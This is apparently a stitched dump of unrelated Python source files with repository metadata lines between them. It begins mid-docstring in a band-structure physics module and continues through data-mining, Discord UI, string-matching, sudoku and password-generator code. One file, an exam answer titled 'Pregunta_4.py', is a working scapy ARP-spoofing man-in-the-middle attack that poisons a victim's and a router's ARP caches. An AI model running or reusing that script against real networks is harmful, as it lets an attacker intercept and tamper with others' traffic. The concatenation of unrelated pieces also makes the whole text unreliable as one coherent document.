\\alpha=10.0 (E_g=0.1 \\mathrm{eV}) \\rightarrow |\\vec{k}| \\geq 0.81 \\mathrm{AA^{-1}} .. math:: m=m_e, \\alpha=0.1 (E_g=10 \\mathrm{eV}) \\rightarrow |\\vec{k}| \\geq 0.081 \\mathrm{AA^{-1}} For a simple cell of 10 :math:`\\mathrm{AA}`, the BZ border is typically at 0.31 :math:`\\mathrm{AA^{-1}}` and for a smaller cell, e.g. 3.1 :math:`\\mathrm{AA}`, the BZ border is here at 1.0 :math:`\\mathrm{AA^{-1}}`. .. warning:: In order to be able to use all values of :math:`a`, we return a linear :math:`E(\\vec{k})` in the undefined region (the last defined value of :math:`E(\\vec{k})` is used). This is highly unphysical, so we print a warning to notice the user """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running non_parabolic_energy_2.") if (effmass < 0 and a > 0) or (effmass > 0 and a < 0): # pylint: disable=chained-comparison k2 = np.sum(k * k, axis=1) last_valid_k2 = -effmass / \ (4 * a * constants.bandunit) - constants.zerocut last_valid_energy = ( -1.0 + np.sqrt(1 + 4 * a * (constants.bandunit * last_valid_k2 / effmass))) / (2 * a) logger.warning( "The product of the effective mass " "and non parabolic correction factor " "is negative. The Kane model is thus " "only defined for a restricted k-vector set. " "Returning a linear E(k)=E in the undefined " "region, where the linear E is the last " "allowed value. USER BEWARE THAT THE " "TRANSPORT INTEGRALS COULD PICK UP THIS " "DISCONTINUITY. Last valid energy for " "the Kane model is %s eV. Remember no " "band folding is performed.", str(last_valid_energy)) energy = constants.bandunit * k2 / effmass # need to loop manually to fill the array outside the # valid range for i in range(k2.shape[0]): if k2[i] < last_valid_k2: energy[i] = (-1.0 + np.sqrt(1 + 4 * a * energy[i])) / (2 * a) else: energy[i] = last_valid_energy return energy e_parabolic = constants.bandunit * \ np.sum(k * k, axis=1) / effmass return (-1.0 + np.sqrt(1 + 4 * a * e_parabolic)) / (2 * a) def non_parabolic_velocity_2(k, effmass, a): r""" Calculates the group velocity for the energy dispersion generated in :func:`non_parabolic_energy_2`. For both parabolic and non-parabolic. Parameters ---------- k : ndarray | Dimension: (N,3) Contains the N k-point in cartesian coordinates where the dispersion is to be evaluated. effmass : float The effective mass in units of the free electron mass. a : ndarray | Dimension: (3) The :math:`\\alpha` factor. Returns ------- vx, vy, vz : ndarray, ndarray, ndarray | Dimension: (N), (N), (N) The group velocity along each axis in the reciprocal unit cell. In units of eVAA. Notes ----- Consult comments in :func:`non_parabolic_energy_1` .. warning:: The factor :math:`\\hbar^{-1}` is not returned and need to be included externally. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running non_parabolic_velocity_2.") spreadkz, spreadky, spreadkx = k.T[2], k.T[1], k.T[0] # check validity if (effmass < 0 and a > 0) or (effmass > 0 and a < 0): # pylint: disable=chained-comparison k2 = np.sum(k * k, axis=1) last_valid_k2 = -effmass / \ (4 * a * constants.bandunit) energy = constants.bandunit * k2 / effmass last_valid_energy = ( -1.0 + np.sqrt(1 + 4 * a * (constants.bandunit * last_valid_k2 / effmass))) / (2 * a) # need to loop manually to fill the array outside the # valid range for i in range(k2.shape[0]): if k2[i] < last_valid_k2: energy[i] = (-1.0 + np.sqrt(1 + 4 * a * energy[i])) / (2 * a) else: energy[i] = last_valid_energy else: e_parabolic = constants.bandunit * \ np.sum(k * k, axis=1) / effmass energy = (-1.0 + np.sqrt(1 + 4 * a * e_parabolic)) / (2 * a) scaling = 2.0 * constants.bandunit / (effmass * (1 + 2 * a * energy)) vx = np.multiply(scaling, spreadkx) vy = np.multiply(scaling, spreadky) vz = np.multiply(scaling, spreadkz) return vx, vy, vz def parabolic_effective_mass(effmass_t): """ Checks if the supplied effective mass array is parabolic. Parameters ---------- effmass_t : ndarray The effective mass tensor in units of the free electron mass. Returns ------- boolean True if parabolic tensors, False otherwise. """ # set logger logger = logging.getLogger(sys._getframe().f_code.co_name) # pylint: disable=protected-access logger.debug("Running parabolic_effective_mass.") effmass = effmass_t[0] if not np.allclose(np.array([effmass, effmass, effmass]), effmass_t, atol=constants.zerocut): return False return True
1.976563
2
spyke/enums/other.py
m4reQ/spyke
0
12789666
import enum class CameraType(enum.Enum): Orthographic = enum.auto() Perspective = enum.auto() class Vendor(enum.Enum): Nvidia = enum.auto() Intel = enum.auto() Amd = enum.auto() WindowsSoftware = enum.auto() Unknown = enum.auto()
2.328125
2
src/ops/python/rec_dataset.py
lonway/poeem
38
12789667
<reponame>lonway/poeem<filename>src/ops/python/rec_dataset.py import tensorflow as tf from tensorflow.python.framework import ops from tensorflow.python.data.ops import dataset_ops from tensorflow.python.framework import dtypes from poeem.ops.bin import rec_dataset_op class RecDataset(dataset_ops.Dataset): def _apply_options(self): # otherwise tf1.15 would apply OptimizeDataset. return self def __init__(self, train_file = "", user_file = "", item_file = "", user_column_index = 0, item_column_index = 1, neg_item_count = 0): self.train_file = ops.convert_to_tensor( train_file, dtype=dtypes.string, name="train_file") self.user_file = ops.convert_to_tensor( user_file, dtype=dtypes.string, name="user_file") self.item_file = ops.convert_to_tensor( item_file, dtype=dtypes.string, name="item_file") self.user_column_index = ops.convert_to_tensor( user_column_index, dtype=dtypes.int32, name="user_column_index") self.item_column_index = ops.convert_to_tensor( item_column_index, dtype=dtypes.int32, name="item_column_index") self.neg_item_count = ops.convert_to_tensor( neg_item_count, dtype=dtypes.int32, name="neg_item_count") # Create any input attrs or tensors as members of this class. super(RecDataset, self).__init__() def _as_variant_tensor(self): return rec_dataset_op.rec_dataset( self.train_file, self.user_file, self.item_file, self.user_column_index, self.item_column_index, self.neg_item_count) def _inputs(self): return [] @property def output_types(self): return tf.string @property def output_shapes(self): return tf.TensorShape([]) @property def output_classes(self): return tf.Tensor
2.203125
2
unlockgnn/datalib/mining.py
CalvinCYY/unlockGNN
0
12789668
"""Tools to scrape relevant compound data from Materials Project and label their ions' SSEs appropriately.""" from multiprocessing import Pool from operator import itemgetter from pathlib import Path from typing import Optional, Tuple, Union import pandas as pd import pyarrow.feather as feather import pymatgen import smact.data_loader as smact_data from matminer.data_retrieval.retrieve_MP import MPDataRetrieval from smact.structure_prediction.structure import SmactStructure def download_structures( mp_api_key: str, file: Optional[Union[str, Path]] = None ) -> pd.DataFrame: """Create database of MP IDs and structures. Queries for binary compounds with experimentally determined crystal structures that have been reported to the ICSD. Optionally, writes a database of their `material_id`s and their structures as a feather to the specified file. Args: mp_api_key (str): The `Materials Project`_ API key to use. file (str, optional): The path to the file, to which to write the feathered data. If omitted (None), does not write to a file. Returns: :obj:`pd.DataFrame`: A dataframe containting the materials IDs and structures of the compounds. .. _Materials Project: https://materialsproject.org/open """ df_mp = MPDataRetrieval(mp_api_key).get_dataframe( criteria={"icsd_ids.0": {"$exists": True}, "nelements": 2}, properties=["material_id", "structure"], index_mpid=False, # Index isn't preserved when writing to file ) df_mp["structure"] = [structure.to_json() for structure in df_mp["structure"]] if file is not None: feather.write_feather(df_mp, file) return df_mp def get_smact_struct(py_struct) -> Union[SmactStructure, None]: """Get a SMACT structure from a pymatgen structure and handle errors. If bond valencey can't be determined, returns `None`. Args: py_struct (:obj:`pymatgen.Structure`): The structure to convert. Returns: :obj:`SmactStructure`, optional: The SmactStructure object, or `None` if the bond valency could not be determined. """ try: return SmactStructure.from_py_struct(py_struct) except ValueError: return None def add_smact_structs( df: pd.DataFrame, file: Optional[Union[str, Path]] = None ) -> pd.DataFrame: """Add species columns to a DataFrame containing pymatgen `Structure`s. Species column is entitled 'species'. Removes rows that cannot be converted due to ambiguous bond valency. Optionally outputs the new DataFrame to a file. Args: df (:obj:`pd.DataFrame`): A DataFrame containing pymatgen structures in a column entitled 'structure'. file (str, optional): The path to a file, to which to write the feathered data. If omitted (None), does not write to a file. Returns: df (:obj:`pd.DataFrame`): The DataFrame with added species columns. """ structures = ( pymatgen.Structure.from_str(struct, "json") for struct in df["structure"] ) with Pool() as pool: df["smact_struct"] = pool.map(get_smact_struct, structures) df.dropna(inplace=True) df["smact_struct"] = [struct.as_poscar() for struct in df["smact_struct"]] if file is not None: feather.write_feather(df, file) return df def lookup_sse( symbol: str, charge: int, pauling_fallback: bool = True ) -> Optional[float]: """Lookup the SSE of an ion, given its symbol and charge. Args: symbol (str): The elemental symbol of the species. charge (int): The oxidation state of the ion. pauling_fallback (bool): Whether to load estimate from the Pauling database if data does not exist in the calculated SSE database. Returns: SSE (float or None): The SSE of the ion, or `None` if it is not in the SMACT database. """ data_2015 = smact_data.lookup_element_sse2015_data(symbol, copy=False) try: for data in data_2015: if data["OxidationState"] == charge: return data["SolidStateEnergy2015"] except TypeError: pass # Got `None` from sse2015 lookup if pauling_fallback: data_pauli = smact_data.lookup_element_sse_pauling_data(symbol) try: return data_pauli["SolidStateEnergyPauling"] except TypeError: pass # Got `None` from sse_pauli lookup return None def get_cat_an_sse( smact_struct: SmactStructure, ) -> Tuple[Optional[float], Optional[float]]: """Return the cation and anion SSEs of ions in a binary compound. If there are multiple oxidation states per element, this function returns `None` for both cation and anion SSE. Args: smact_struct (:obj:`SmactStructure`): The `SmactStructure` of the compound. Returns: cation_sse (float): The SSE of the cation, or `None` if compound is not binary. anion_sse (float): The SSE of the anion, or `None` if compound is not binary. """ if len(smact_struct.species) != 2: # More than two combinations of element and charge exist in the compound return (None, None) # Determine anion and cation by sorting on charge anion, cation = tuple(sorted(smact_struct.species, key=itemgetter(1))) anion_sse = lookup_sse(anion[0], anion[1]) cation_sse = lookup_sse(cation[0], cation[1]) return cation_sse, anion_sse def extract_sse_data( df: pd.DataFrame, file: Optional[Union[str, Path]] = None ) -> pd.DataFrame: """Add columns for SSEs to a DataFrame containing `SmactStructure`s. Cation SSE contained in 'cat_sse', anion sse contained in 'an_sse'. Optionally outputs the new DataFrame to a file. Args: df (:obj:`pd.DataFrame`): A DataFrame containing `SmactStructure`s in a column entitled 'smact_struct'. file (str, optional): The path to a file, to which to write the feathered data. If omitted (None), does not write to a file. Returns: df (:obj:`pd.DataFrame`): The DataFrame with added `SmactStructure`s. """ smact_structs = map(SmactStructure.from_poscar, df["smact_struct"]) cat_an_sses = list(map(get_cat_an_sse, smact_structs)) df["cat_sse"] = list(map(itemgetter(0), cat_an_sses)) df["an_sse"] = list(map(itemgetter(1), cat_an_sses)) df.dropna(inplace=True) if file is not None: feather.write_feather(df, file) return df
2.6875
3
discord/ext/ui/message.py
sushi-chaaaan/discord-ext-ui-fork
27
12789669
from __future__ import annotations from typing import Union import discord from discord import ui from .item import Item class Message: def __init__( self, content: str = "", embeds: list[discord.Embed] = None, components: list[Union[list[Item], Item]] = None): self._content = content self._embeds: list[discord.Embed] = embeds or [] self._components: list[Union[list[Item], Item]] = components or [] def content(self, content: str) -> Message: self._content = content return self def embed(self, embed: discord.Embed) -> Message: self._embeds.append(embed) return self def embeds(self, embeds: list[discord.Embed]) -> Message: self._embeds.extend(embeds) return self def item(self, item: Union[list[Item], Item]) -> Message: self._components.append(item) return self def items(self, items: list[Union[list[Item], Item]]) -> Message: self._components.extend(items) return self def get_discord_items(self) -> list[ui.Item]: row = 0 items = [] for component in self._components: if isinstance(component, list): for sub_component in component: # type: Item items.append(sub_component.to_discord_item(row)) row += 1 else: items.append(component.to_discord_item(None)) return items def __eq__(self, other: Message) -> bool: return self._components == other._components\ and self._embeds == other._embeds\ and self._content == other._content
2.8125
3
biometrics/sex_mismatch.py
msk-access/biometrics
1
12789670
import pandas as pd import numpy as np class SexMismatch: """ Class to detect sex mismatch """ def __init__(self, threshold): self.threshold = threshold def predict_sex(self, sample): if sample.region_counts is None: return np.nan total_count = sample.region_counts['count'].sum() predicted_sex = 'M' if total_count > self.threshold else 'F' return predicted_sex def detect_mismatch(self, samples): results = [] for i, sample_name in enumerate(samples): sample = samples[sample_name] predicted_sex = self.predict_sex(sample) results.append({ 'sample': sample_name, 'expected_sex': sample.sample_sex, 'predicted_sex': predicted_sex }) results = pd.DataFrame(results) results['sex_mismatch'] = \ (results['expected_sex'] != results['predicted_sex']).astype(str) results.loc[pd.isna(results['predicted_sex']), 'sex_mismatch'] = np.nan return results
3.0625
3
bin/calculate_dataset_metrics.py
samsungnlp/semeval2022-task9
0
12789671
#!/usr/bin/env python import pprint from src.data_question_class_statistics import QuestionClassStatistics from src.data_statistics import PassageStatsCalculator, QuestionsAnswersMinMaxAvgStats from src.data_statistics_closed_set_answers import ClosedSetAnswerChecker from src.data_statistics_extractive_answer import ExtractiveAnswerChecker from src.data_statistics_extractive_answer import RecoverableAnswerChecker, AppendHandler from src.datafile_parser import DatafileParser from src.get_root import get_root if __name__ == "__main__": rec = RecoverableAnswerChecker() handler = AppendHandler() rec.handler_on_non_recoverable_items.append(handler) qcc = QuestionClassStatistics() dataset = DatafileParser.get_resource("val") checkers = [PassageStatsCalculator(), QuestionsAnswersMinMaxAvgStats(), ExtractiveAnswerChecker(), rec, ClosedSetAnswerChecker(), QuestionClassStatistics(), qcc] ret = {} for checker in checkers: metrics = checker.calc_statistics(dataset) ret.update(metrics) pprint.pprint(ret) qcc.save_to_excel_workbook_per_class(f"{get_root()}/resources/")
2.15625
2
Python/other/sudoku_backtracking.py
zhcet19/NeoAlgo-1
897
12789672
<filename>Python/other/sudoku_backtracking.py def solve(board, i=0, j=0): i,j = nextCell(board, i, j) if i == -1: return True for e in range(1,10): if isValid(board,i,j,e): board[i][j] = e if solve(board, i, j): return True board[i][j] = 0 return False def print_board(board): for i in range(len(board)): if i % 3 ==0 and i != 0: print("------------------------") for j in range(len(board[0])): if j % 3 ==0 and j !=0: print("|",end="") if j == 8: print(board[i][j]) else: print(str(board[i][j]) + " " , end="") def nextCell(board, i, j): for x in range(i,9): for y in range(j,9): if board[x][y] == 0: return x,y for x in range(0,9): for y in range(0,9): if board[x][y] == 0: return x,y return -1,-1 def isValid(board,x,y,n): for i in range(9): if board[x][i] == n or board[i][y] == n: return False new_x = x//3 * 3 new_y = y//3 * 3 for i in range(3): for j in range(3): if board[new_x + i][new_y + j] == n: return False return True if __name__ == "__main__": print("Enter the numbers row by row, and put 0 for empty space:") board = [[int(input()) for x in range (9)] for y in range(9)] solve(board) print_board(board) """ Let's say we have this board: Empty space is replaced with 0. [[5, 3, 0, 0, 7, 0, 0, 0, 0], [6, 0, 0, 1, 9, 5, 0, 0, 0], [0, 9, 8, 0, 0, 0, 0, 6, 0], [8, 0, 0, 0, 6, 0, 0, 0, 3], [4, 0, 0, 8, 0, 3, 0, 0, 1], [7, 0, 0, 0, 2, 0, 0, 0, 6], [0, 6, 0, 0, 0, 0, 2, 8, 0], [0, 0, 0, 4, 1, 9, 0, 0, 5], [0, 0, 0, 0, 8, 0, 0, 7, 9]] # When the program asks for input we give like this : 5, 3, 0, 0, 7, 0, 0, 0, 0,6, 0, 0, 1, 9, 5, 0, 0, 0,0, 9, 8, 0, 0, 0, 0, 6, 0, 8, 0, 0, 0, 6, 0, 0, 0, 3,4, 0, 0, 8, 0, 3, 0, 0, 1, 7, 0, 0, 0, 2, 0, 0, 0, 6, 0, 6, 0, 0, 0, 0, 2, 8, 0,0, 0, 0, 4, 1, 9, 0, 0, 5, 0, 0, 0, 0, 8, 0, 0, 7, 9 #output will look like this: 5 3 4 |6 7 8 |9 1 2 6 7 2 |1 9 5 |3 4 8 1 9 8 |3 4 2 |5 6 7 ------------------------ 8 5 9 |7 6 1 |4 2 3 4 2 6 |8 5 3 |7 9 1 7 1 3 |9 2 4 |8 5 6 ------------------------ 9 6 1 |5 3 7 |2 8 4 2 8 7 |4 1 9 |6 3 5 3 4 5 |2 8 6 |1 7 9 """
4.25
4
Model_setup/NEISO_exchange_time_series.py
keremakdemir/ISONE_UCED
0
12789673
# -*- coding: utf-8 -*- """ Created on Mon May 14 17:29:16 2018 @author: jdkern """ from __future__ import division import pandas as pd import numpy as np def exchange(year): df_data = pd.read_csv('../Time_series_data/Synthetic_demand_pathflows/Sim_daily_interchange.csv',header=0) paths = ['SALBRYNB', 'ROSETON', 'HQ_P1_P2', 'HQHIGATE', 'SHOREHAM', 'NORTHPORT'] df_data = df_data[paths] df_data = df_data.loc[year*365:year*365+364,:] # select dispatchable imports (positive flow days) imports = df_data imports = imports.reset_index() for p in paths: for i in range(0,len(imports)): if imports.loc[i,p] < 0: imports.loc[i,p] = 0 else: pass imports_total = imports.copy() imports_total.rename(columns={'SALBRYNB':'NB_imports_ME'}, inplace=True) imports_total['HYDRO_QUEBEC'] = imports_total['HQ_P1_P2'] + imports_total['HQHIGATE'] imports_total['NEWYORK'] = imports_total['ROSETON'] + imports_total['SHOREHAM'] + imports_total['NORTHPORT'] imports_total['NY_imports_CT'] = imports_total['NEWYORK'].mul(4).div(9) imports_total['NY_imports_WCMA'] = imports_total['NEWYORK'].div(9) imports_total['NY_imports_VT'] = imports_total['NEWYORK'].mul(4).div(9) imports_total.rename(columns={'HYDRO_QUEBEC':'HQ_imports_VT'}, inplace=True) del imports_total['ROSETON'] del imports_total['HQ_P1_P2'] del imports_total['HQHIGATE'] del imports_total['SHOREHAM'] del imports_total['NORTHPORT'] del imports_total['NEWYORK'] imports_total.to_csv('Path_setup/NEISO_dispatchable_imports.csv') # hourly exports df_data = pd.read_csv('../Time_series_data/Synthetic_demand_pathflows/Sim_daily_interchange.csv',header=0) df_data = df_data[paths] df_data = df_data.loc[year*365:year*365+364,:] df_data = df_data.reset_index() e = np.zeros((8760,len(paths))) #SALBRYNB path_profiles = pd.read_excel('Path_setup/NEISO_path_export_profiles.xlsx',sheet_name='SALBRYNB',header=None) pp = path_profiles.values for i in range(0,len(df_data)): if df_data.loc[i,'SALBRYNB'] < 0: e[i*24:i*24+24,0] = pp[i,:]*df_data.loc[i,'SALBRYNB']*-1 #ROSETON path_profiles = pd.read_excel('Path_setup/NEISO_path_export_profiles.xlsx',sheet_name='ROSETON',header=None) pp = path_profiles.values for i in range(0,len(df_data)): if df_data.loc[i,'ROSETON'] < 0: e[i*24:i*24+24,1] = pp[i,:]*df_data.loc[i,'ROSETON']*-1 #HQ_P1_P2 path_profiles = pd.read_excel('Path_setup/NEISO_path_export_profiles.xlsx',sheet_name='HQ_P1_P2',header=None) pp = path_profiles.values for i in range(0,len(df_data)): if df_data.loc[i,'HQ_P1_P2'] < 0: e[i*24:i*24+24,2] = pp[i,:]*df_data.loc[i,'HQ_P1_P2']*-1 #HQHIGATE path_profiles = pd.read_excel('Path_setup/NEISO_path_export_profiles.xlsx',sheet_name='HQHIGATE',header=None) pp = path_profiles.values for i in range(0,len(df_data)): if df_data.loc[i,'HQHIGATE'] < 0: e[i*24:i*24+24,3] = pp[i,:]*df_data.loc[i,'HQHIGATE']*-1 #SHOREHAM path_profiles = pd.read_excel('Path_setup/NEISO_path_export_profiles.xlsx',sheet_name='SHOREHAM',header=None) pp = path_profiles.values for i in range(0,len(df_data)): if df_data.loc[i,'SHOREHAM'] < 0: e[i*24:i*24+24,4] = pp[i,:]*df_data.loc[i,'SHOREHAM']*-1 #NORTHPORT path_profiles = pd.read_excel('Path_setup/NEISO_path_export_profiles.xlsx',sheet_name='NORTHPORT',header=None) pp = path_profiles.values for i in range(0,len(df_data)): if df_data.loc[i,'NORTHPORT'] < 0: e[i*24:i*24+24,5] = pp[i,:]*df_data.loc[i,'NORTHPORT']*-1 exports = pd.DataFrame(e) exports.columns = paths exports_total = exports.copy() exports_total.rename(columns={'SALBRYNB':'ME_exports_NB'}, inplace=True) exports_total['HYDRO_QUEBEC'] = exports_total['HQ_P1_P2'] + exports_total['HQHIGATE'] exports_total['NEWYORK'] = exports_total['ROSETON'] + exports_total['SHOREHAM'] + exports_total['NORTHPORT'] exports_total['CT_exports_NY'] = exports_total['NEWYORK'].mul(4).div(9) exports_total['WCMA_exports_NY'] = exports_total['NEWYORK'].div(9) exports_total['VT_exports_NY'] = exports_total['NEWYORK'].mul(4).div(9) exports_total.rename(columns={'HYDRO_QUEBEC':'VT_exports_HQ'}, inplace=True) del exports_total['ROSETON'] del exports_total['HQ_P1_P2'] del exports_total['HQHIGATE'] del exports_total['SHOREHAM'] del exports_total['NORTHPORT'] del exports_total['NEWYORK'] exports_total.to_csv('Path_setup/NEISO_exports.csv') return None
2.4375
2
exact_string_matching/backward.py
pmikolajczyk41/string-algorithms
0
12789674
<gh_stars>0 from common import suffix def brute_force(t, w, n, m): i = 1 while i <= n - m + 1: j = m while j > 0 and t[i + j - 1] == w[j]: j = j - 1 if j == 0: yield i i = i + 1 def weak_boyer_moore(t, w, n, m): wBM = suffix.weak_boyer_moore_shift(w, m) i = 1 while i <= n - m + 1: j = m while j > 0 and t[i + j - 1] == w[j]: j = j - 1 if j == 0: yield i i = i + wBM[j] def boyer_moore(t, w, n, m): BM = suffix.boyer_moore_shift(w, m) i = 1 while i <= n - m + 1: j = m while j > 0 and t[i + j - 1] == w[j]: j = j - 1 if j == 0: yield i i = i + BM[j] def boyer_moore_galil(t, w, n, m): BM = suffix.boyer_moore_shift(w, m) i, memory = 1, 0 while i <= n - m + 1: j = m while j > memory and t[i + j - 1] == w[j]: j = j - 1 if j == memory: yield i i, memory = i + BM[0], m - BM[0] else: i, memory = i + BM[j], 0 def boyer_moore_bad_shift(t, w, n, m): BM, LAST = suffix.boyer_moore_shift(w, m), suffix.last_occurrence(w[:-1]) i = 1 while i <= n - m + 1: j = m while j > 0 and t[i + j - 1] == w[j]: j = j - 1 if j == 0: yield i bad_character = LAST.get(t[i + j - 1], 0) i = i + max(BM[j], j - bad_character) def bad_shift_heuristic(t, w, n, m): LAST = suffix.last_occurrence(w) i = 1 while i <= n - m + 1: j = m while j > 0 and t[i + j - 1] == w[j]: j = j - 1 if j == 0: yield i bad_character = LAST.get(t[i + j - 1], 0) i = i + max(1, j - bad_character) def quick_search(t, w, n, m): LAST = suffix.last_occurrence(w) i = 1 while i <= n - m + 1: j = 1 while j <= m and t[i + j - 1] == w[j]: j = j + 1 if j == m + 1: yield i bad_character = LAST.get(t[i + m], 0) if i + m <= n else 0 i = i + (m + 1 - bad_character) def horspool(t, w, n, m): LAST = suffix.last_occurrence(w[:-1]) i = 1 while i <= n - m + 1: c = t[i + m - 1] if w[m] == c: j = 1 while j < m and t[i + j - 1] == w[j]: j = j + 1 if j == m: yield i bad_character = LAST.get(c, 0) i = i + (m - bad_character)
2.484375
2
tests/test_contact.py
rehanalam1/python-o365
0
12789675
from O365 import contact import unittest import json import time class Resp: def __init__(self,json_string,code=None): self.jsons = json_string self.status_code = code def json(self): return json.loads(self.jsons) contact_rep = open('contacts.json','r').read() contacts_json = json.loads(contact_rep) jeb = contacts_json['value'][0] bob = contacts_json['value'][2] t_string = '%Y-%m-%dT%H:%M:%SZ' urls = ['https://outlook.office365.com/api/v1.0/me/contacts/', 'https://outlook.office365.com/api/v1.0/me/contacts/bigguid1', 'https://outlook.office365.com/api/v1.0/me/contacts/bigguid2', 'https://outlook.office365.com/api/v1.0/me/contacts/bigguid3'] def delete(url,headers,auth): if url not in urls: print(url) raise BaseException('Url wrong') if auth[0] != '<EMAIL>': raise BaseException('wrong email') if auth[1] != 'pass': raise BaseException('wrong password') if headers['Content-type'] != 'application/json': raise BaseException('header wrong value for content-type.') if headers['Accept'] != 'text/plain': raise BaseException('header accept wrong.') return Resp(None,204) contact.requests.delete = delete def post(url,data,headers,auth): if url not in urls: raise BaseException('Url wrong') if auth[0] != '<EMAIL>': raise BaseException('wrong email') if auth[1] != 'pass': raise BaseException('wrong password') if headers['Content-type'] != 'application/json': raise BaseException('header wrong value for content-type.') if headers['Accept'] != 'application/json': raise BaseException('header accept wrong.') if json.loads(data) != jeb and json.loads(data) != bob: raise BaseException('data is wrong.') return Resp(data,202) #return True contact.requests.post = post def patch(url,data,headers,auth): if url not in urls: raise BaseException('Url wrong') if auth[0] != '<EMAIL>': raise BaseException('wrong email') if auth[1] != 'pass': raise BaseException('wrong password') if headers['Content-type'] != 'application/json': raise BaseException('header wrong value for content-type.') if headers['Accept'] != 'application/json': raise BaseException('header accept wrong.') return Resp(data,202) #return True contact.requests.patch = patch auth = ('<EMAIL>','<PASSWORD>') class TestInbox (unittest.TestCase): def setUp(self): self.jeb = contact.Contact(jeb,auth) self.bob = contact.Contact(bob,auth) def test_create(self): self.assertTrue(self.jeb.create()) self.assertTrue(self.bob.create()) def test_update(self): self.assertTrue(self.jeb.update()) self.assertTrue(self.bob.update()) def test_delete(self): self.assertTrue(self.jeb.delete()) self.assertTrue(self.bob.delete()) def test_auth(self): self.assertEqual('<EMAIL>',self.jeb.auth[0]) self.assertEqual('pass',self.jeb.auth[1]) self.assertEqual('<EMAIL>',self.bob.auth[0]) self.assertEqual('pass',self.bob.auth[1]) if __name__ == '__main__': unittest.main()
2.375
2
tests/test_generators.py
smartlegionlab/smartpassgen
2
12789676
# -*- coding: utf-8 -*- # -------------------------------------------------------- # Licensed under the terms of the BSD 3-Clause License # (see LICENSE for details). # Copyright © 2018-2021, <NAME> # All rights reserved. # -------------------------------------------------------- # https://github.com/smartlegionlab # <EMAIL> # -------------------------------------------------------- class TestPassGen: def test_generate(self, pass_gen, context): assert pass_gen.generate() != pass_gen.generate() assert pass_gen.generate(login=context.login) != pass_gen.generate(login=context.login) assert pass_gen.generate(login=context.login, secret=context.secret) == context.smart_pass assert pass_gen.generate(secret=context.secret) == context.norm_pass def test_make_password(self, pass_gen): assert pass_gen.make_password() != pass_gen.make_password() assert len(pass_gen.make_password(length=30)) == 30 assert pass_gen.make_password(seed='new') == pass_gen.make_password(seed='new') class TestKeyGen: def test_make(self, key_gen, context): assert key_gen.make(login=context.login, secret=context.secret) == context.key def test_check(self, key_gen, context): assert key_gen.check(login=context.login, secret=context.secret, key=context.key) def test__get_hash(self, key_gen): assert key_gen._get_hash('Py') != key_gen._get_hash('Yp') def test_get_base_password(func_get_base, context): assert func_get_base(length=context.length) != func_get_base(length=context.length) def test_get_norm_password(func_get_norm, context): assert func_get_norm(secret=context.secret, length=context.length) == context.norm_pass def test_get_smart_password(func_get_smart, context): assert func_get_smart(login=context.login, secret=context.secret, length=context.length) == context.smart_pass def test_make_public_key(func_make_key, context): assert func_make_key(login=context.login, secret=context.secret) == context.key def test_check_public_key(func_check_key, context): assert func_check_key(login=context.login, secret=context.secret, key=context.key)
2.40625
2
Examenes/Parcial/Pregunta_4.py
MrAngelwwev2/CC411-Seguridad-en-sistemas-informaticos
0
12789677
<reponame>MrAngelwwev2/CC411-Seguridad-en-sistemas-informaticos #El siguiente programa en Python consiste en conocer la MAC tanto de la victima como del router #Realizamos las importaciones necesarias import os import time import sys from scapy.all import * from scapy.layers.inet import * def obtenerInformacion(): print("Obteniendo direcciones") interface = input("Interface (en0 is Macbook Wifi):") victimaIP = input("IP de la victima:") routerIP = input("IP del router:") return [interface, victimaIP, routerIP] def confIPReenvio(toggle): if(toggle == True): print("~~~Turing en el reenvio de IP") os.system('sysctl -w net.inet.ip.forwarding=1') if(toggle == False): print("~~~Turing off en el reenvio de IP...") os.system('sysctl -w net.inet.ip.forwarding=0') def obtener_MAC(ip, interface): answer, unanswer = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = ip), timeout = 2, iface=interface, inter = 0.1) for send,recieve in answer: return recieve.sprintf(r"%Ether.src%") #Restablece la conexion entre la victima y el router en la capa de enlace de datos. def reasignacionARP(victimaIP, routerIP, interface): print("Reasignacion de ARPS") victimaMAC = obtener_MAC(victimaIP, interface) routerMAC = obtener_MAC(routerIP, interface) send(ARP(op=2, pdst=routerIP, psrc=victimaIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimaMAC, retry=7)) send(ARP(op=2, pdst=victimaIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC, retry=7)) confIPReenvio(False) def ataque(victimIP, victimMAC, routerIP, routerMAC): send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC)) send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC)) def manInTheMiddle(): info = obtenerInformacion() confIPReenvio(True) print("Obteniendo MACs") try: victimaMAC = obtener_MAC(info[1], info[0]) except Exception as e: confIPReenvio(False) print("Error al obtener MAC de la victima") print(e) sys.exit(1) try: routerMAC = obtener_MAC(info[2], info[0]) except Exception as e: confIPReenvio(False) print("Error al obtener MAC del router~!~Error getting router MAC...") print(e) sys.exit(1) print("MAC de la victima: %s" % victimaMAC) print("MAc del router: %s" % routerMAC) print("ATACANDO") while True: try: ataque(info[1], victimaMAC, info[2], routerMAC) time.sleep(1.5) except KeyboardInterrupt: reasignacionARP(info[1], info[2], info[0]) break sys.exit(1) manInTheMiddle()
3.078125
3
util.py
sharpvik/fin
0
12789678
import numpy as np import pandas as pd def sma(price: np.ndarray, period: int) -> np.ndarray: return price.rolling(period).mean()
2.828125
3
pylox/lox_errors.py
BolunThompson/PyLox
2
12789679
